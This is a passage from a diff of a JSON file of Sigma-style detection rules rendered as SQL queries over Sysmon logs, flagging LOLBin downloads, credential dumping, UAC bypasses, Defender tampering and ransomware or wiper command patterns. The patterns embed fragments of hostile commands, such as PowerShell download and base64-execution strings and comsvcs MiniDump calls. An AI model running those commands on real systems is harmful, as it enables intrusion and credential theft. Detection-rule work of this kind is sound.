\\*' ESCAPE '\\' AND (CommandLine LIKE '% > %' ESCAPE '\\' OR CommandLine LIKE '% | Select %' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%Set-Content%' ESCAPE '\\' OR CommandLine LIKE '%Add-Content%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'SQLite' OR (Image LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_user_discovery_get_aduser.yml" + "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" }, { - "title": "Suspicious Compression Tool Parameters", - "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", - "status": "test", - "description": "Detects suspicious command line arguments of common data compression tools", - "author": "Florian Roth (Nextron Systems), Samir Bousseaden", + "title": "Suspicious File Download via CertOC.exe", + "id": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "status": "experimental", + "description": "Detects when a user downloads file by using CertOC.exe", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND CommandLine LIKE '%-GetCACAPS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_compression_params.yml" + "filename": "proc_creation_win_lolbin_certoc_download.yml" }, { - "title": "Rundll32 Registered COM Objects", - "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", + "title": "Potential BlackByte Ransomware Activity", + "id": "999e8307-a775-4d5f-addc-4855632335be", "status": "test", - "description": "load malicious registered COM objects", - "author": "frack113", - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" - ], + "description": "Detects command line patterns used by BlackByte ransomware in different operations", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' AND CommandLine LIKE '% -single %' ESCAPE '\\') OR (CommandLine LIKE '%del C:\\\\Windows\\\\System32\\\\Taskmgr.exe%' ESCAPE '\\' OR CommandLine LIKE '%;Set-Service -StartupType Disabled $%' ESCAPE '\\' OR CommandLine LIKE '%powershell -command \"$x =[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(%' ESCAPE '\\' OR CommandLine LIKE '% do start wordpad.exe /p %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_registered_com_objects.yml" + "filename": "proc_creation_win_malware_blackbyte_ransomware.yml" }, { - "title": "DevInit Lolbin Download", - "id": "90d50722-0483-4065-8e35-57efaadd354d", + "title": "Potential SystemNightmare Exploitation Attempt", + "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", "status": "test", - "description": "Detects a certain command line flag combination used by devinit.exe lolbin to download arbitrary MSI packages on a Windows system", + "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% -t msi-install %' ESCAPE '\\' AND CommandLine LIKE '% -i http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_devinit.yml" + "filename": "proc_creation_win_exploit_other_systemnightmare.yml" }, { - "title": "Process Dump via RdrLeakDiag.exe", - "id": "edadb1e5-5919-4e4c-8462-a9e643b02c4b", + "title": "UAC Bypass Using MSConfig Token Modification - Process", + "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "status": "test", - "description": "Detects a process memory dump performed by RdrLeakDiag.exe", - "author": "Cedric MAURUGEON", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND OriginalFileName = 'RdrLeakDiag.exe' AND CommandLine LIKE '%fullmemdmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" ], - "filename": "proc_creation_win_rdrleakdiag_process_dumping.yml" + "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Change Default File Association To Executable Via Assoc", - "id": "ae6f14e6-14de-45b0-9f44-c0986f50dc89", - "status": "experimental", - "description": "Detects when a program changes the default file association of any extension to an executable.\nWhen a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Persistence Via Netsh Helper DLL", + "id": "56321594-9087-49d9-bf10-524fe8479452", + "status": "test", + "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", + "author": "Victor Sergeev, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.t1546.001" + "attack.t1546.007", + "attack.s0108" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%assoc %' ESCAPE '\\' AND CommandLine LIKE '%exefile%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%.exe=exefile%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_assoc_tamper_exe_file_association.yml" + "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" }, { - "title": "Suspicious Windows Defender Registry Key Tampering Via Reg.EXE", - "id": "452bce90-6fb0-43cc-97a5-affc283139b3", - "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to tamper with different Windows defender registry keys in order to disable some important features related to protection and detection", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious RASdial Activity", + "id": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "status": "test", + "description": "Detects suspicious process related to rasdial.exe", + "author": "juju4", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Rare legitimate use by administrators to test software (should always be investigated)" + "False positives depend on scripts and administrative tools used in the monitored environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\')) AND ((CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 0%' ESCAPE '\\' AND (CommandLine LIKE '%Real-Time Protection%' ESCAPE '\\' OR CommandLine LIKE '%TamperProtection%' ESCAPE '\\')) OR (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '% /d 1%' ESCAPE '\\' AND CommandLine LIKE '%Notification\\_Suppress%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%rasdial.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_tampering.yml" + "filename": "proc_creation_win_rasdial_execution.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command", - "id": "bb780e0c-16cf-4383-8383-1e5471db6cf9", + "title": "WMI Persistence - Script Event Consumer", + "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "status": "test", - "description": "Detects presence of a potentially xor encoded powershell command", - "author": "Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali", + "description": "Detects WMI script event consumers", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1059.001", - "attack.t1140", - "attack.t1027" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" ], "falsepositives": [ - "Unknown" + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR Description = 'Windows PowerShell' OR Product = 'PowerShell Core 6') AND CommandLine LIKE '%bxor%' ESCAPE '\\' AND (CommandLine LIKE '%ForEach%' ESCAPE '\\' OR CommandLine LIKE '%for(%' ESCAPE '\\' OR CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%-join %' ESCAPE '\\' OR CommandLine LIKE '%-join''%' ESCAPE '\\' OR CommandLine LIKE '%-join\"%' ESCAPE '\\' OR CommandLine LIKE '%-join`%' ESCAPE '\\' OR CommandLine LIKE '%::Join%' ESCAPE '\\' OR CommandLine LIKE '%[char]%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_xor_commandline.yml" + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml" }, { - "title": "Execute MSDT Via Answer File", - "id": "9c8c7000-3065-44a8-a555-79bcba5d9955", - "status": "experimental", - "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "UAC Bypass Tools Using ComputerDefaults", + "id": "3c05e90d-7eba-4324-9972-5d7f711a60a8", + "status": "test", + "description": "Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\WINDOWS\\\\diagnostics\\\\index\\\\PCWDiagnostic.xml%' ESCAPE '\\' AND (CommandLine LIKE '% -af %' ESCAPE '\\' OR CommandLine LIKE '% /af %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\pcwrun.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (IntegrityLevel IN ('High', 'System') AND Image LIKE 'C:\\\\Windows\\\\System32\\\\ComputerDefaults.exe' ESCAPE '\\') AND NOT ((ParentImage LIKE '%:\\\\Windows\\\\System32%' ESCAPE '\\' OR ParentImage LIKE '%:\\\\Program Files%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msdt_answer_file.yml" + "filename": "proc_creation_win_uac_bypass_computerdefaults.yml" }, { - "title": "New Kernel Driver Via SC.EXE", - "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", - "status": "experimental", - "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Execution of InstallUtil Without Log", + "id": "d042284c-a296-4988-9be5-f424fadcc28c", + "status": "test", + "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" + "attack.defense_evasion" ], "falsepositives": [ - "Rare legitimate installation of kernel drivers via sc.exe" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" ], - "filename": "proc_creation_win_sc_new_kernel_driver.yml" + "filename": "proc_creation_win_instalutil_no_log_execution.yml" }, { - "title": "Suspicious Hacktool Execution - PE Metadata", - "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "title": "HackTool - SharpLDAPmonitor Execution", + "id": "9f8fc146-1d1a-4dbf-b8fd-dfae15e08541", "status": "experimental", - "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\SharpLDAPmonitor.exe' ESCAPE '\\' OR OriginalFileName = 'SharpLDAPmonitor.exe') OR (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/dcip:%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + "filename": "proc_creation_win_hktl_sharp_ldap_monitor.yml" }, { - "title": "Process Reconnaissance Via Wmic.EXE", - "id": "221b251a-357a-49a9-920a-271802777cc0", + "title": "Greedy File Deletion Using Del", + "id": "204b17ae-4007-471b-917b-b917b315c5db", "status": "experimental", - "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", + "description": "Detects execution of the \"del\" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.", "author": "frack113", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%process%' ESCAPE '\\') AND NOT (CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%del %' ESCAPE '\\' OR CommandLine LIKE '%erase %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\\\*.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\*.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_process.yml" + "filename": "proc_creation_win_cmd_del_greedy_deletion.yml" }, { - "title": "UAC Bypass Using MSConfig Token Modification - Process", - "id": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", + "title": "PowerShell Download Pattern", + "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", "status": "test", - "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects a Powershell process that contains download commands in its command line string", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel IN ('High', 'System') AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\msconfig.exe\" -5' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml" + "filename": "proc_creation_win_powershell_download_patterns.yml" }, { - "title": "Shadow Copies Creation Using Operating Systems Utilities", - "id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", - "status": "test", - "description": "Shadow Copies creation using operating systems utilities, possible credential access", - "author": "Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "Hermetic Wiper TG Process Patterns", + "id": "2f974656-6d83-4059-bbdf-68ac5403422f", + "status": "experimental", + "description": "Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003", - "attack.t1003.002", - "attack.t1003.003" + "attack.execution", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate administrator working with shadow copies, access for backup purposes" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\policydefinitions\\\\postgresql.exe' ESCAPE '\\' OR (CommandLine LIKE '%CSIDL\\_SYSTEM\\_DRIVE\\\\temp\\\\sys.tmp%' ESCAPE '\\' OR CommandLine LIKE '% 1> \\\\\\\\127.0.0.1\\\\ADMIN$\\\\\\_\\_16%' ESCAPE '\\') OR (CommandLine LIKE '%powershell -c %' ESCAPE '\\' AND CommandLine LIKE '%\\\\comsvcs.dll MiniDump %' ESCAPE '\\' AND CommandLine LIKE '%\\\\winupd.log full%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_shadow_copies_creation.yml" + "filename": "proc_creation_win_malware_hermetic_wiper_activity.yml" }, { - "title": "Suspicious Binary In User Directory Spawned From Office Application", - "id": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "title": "LOLBAS Data Exfiltration by DataSvcUtil.exe", + "id": "e290b10b-1023-4452-a4a9-eb31a9013b3a", "status": "experimental", - "description": "Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)", - "author": "Jason Lynch", + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.g0046", - "car.2013-05-002" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ - "Unknown" + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.exe' ESCAPE '\\') AND Image LIKE 'C:\\\\users\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Teams.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/in:%' ESCAPE '\\' OR CommandLine LIKE '%/out:%' ESCAPE '\\' OR CommandLine LIKE '%/uri:%' ESCAPE '\\') AND (Image LIKE '%\\\\DataSvcUtil.exe' ESCAPE '\\' OR OriginalFileName = 'DataSvcUtil.exe'))" ], - "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml" + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" }, { - "title": "Execution via CL_Invocation.ps1", - "id": "a0459f02-ac51-4c09-b511-b8c9203fc429", - "status": "test", - "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DumpMinitool Execution", + "id": "eb1c4225-1c23-4241-8dd4-051389fde4ce", + "status": "experimental", + "description": "Detects suspicious ways to use the \"DumpMinitool.exe\" binary", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND CommandLine LIKE '%SyncInvoke%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\DumpMinitool.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\DumpMinitool.arm64.exe' ESCAPE '\\') OR OriginalFileName IN ('DumpMinitool.exe', 'DumpMinitool.x86.exe', 'DumpMinitool.arm64.exe')) AND ((NOT ((Image LIKE '%\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Extensions\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.txt%' ESCAPE '\\') OR ((CommandLine LIKE '% Full%' ESCAPE '\\' OR CommandLine LIKE '% Mini%' ESCAPE '\\' OR CommandLine LIKE '% WithHeap%' ESCAPE '\\') AND NOT (CommandLine LIKE '%--dumpType%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_cl_invocation.yml" + "filename": "proc_creation_win_dumpminitool_susp_execution.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Update Activity", - "id": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a", - "status": "experimental", - "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE", + "id": "a35f5a72-f347-4e36-8895-9869b0d5fc6d", + "status": "test", + "description": "Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall", + "author": "Sander Wiebing, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp\\\\app\\\\update.exe' ESCAPE '\\' AND CommandLine LIKE '%--update%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\' AND CommandLine LIKE '%/electron/update/win32/18.12%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%allowedprogram%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%action=allow%' ESCAPE '\\' AND CommandLine LIKE '%program=%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%Public\\%\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\RECYCLER\\\\%' ESCAPE '\\' OR CommandLine LIKE 